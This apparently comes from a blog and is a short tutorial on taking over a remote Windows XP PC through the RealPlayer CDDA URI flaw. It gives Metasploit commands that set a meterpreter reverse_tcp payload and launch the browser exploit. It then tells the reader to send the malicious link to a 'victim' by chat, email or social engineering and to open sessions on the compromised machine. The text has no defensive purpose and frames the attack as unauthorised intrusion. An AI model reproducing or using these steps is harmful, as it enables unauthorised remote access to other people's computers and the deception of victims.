How to Get Access of Remote PC through Real Player

Real Networks RealPlayer CDDA URI Initialization Vulnerability

This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

RealPlayer 11 to 11.1

RealPlayer SP 1.0 to 1.1.4

RealPlayer SP 1.1

Internet Explorer 5 .6


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/realplayer_cdda_uri

Msf exploit (realplayer_cdda_uri)>set payload windows/meterpreter/reverse_tcp

Msf exploit (realplayer_cdda_uri)>set lhost (IP of Local Host)

Msf exploit (realplayer_cdda_uri)>set srvhost (This must be an address on the local machine)

Msf exploit (realplayer_cdda_uri)>set uripath realplayer (The Url to use for this exploit)

Msf exploit (realplayer_cdda_uri)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *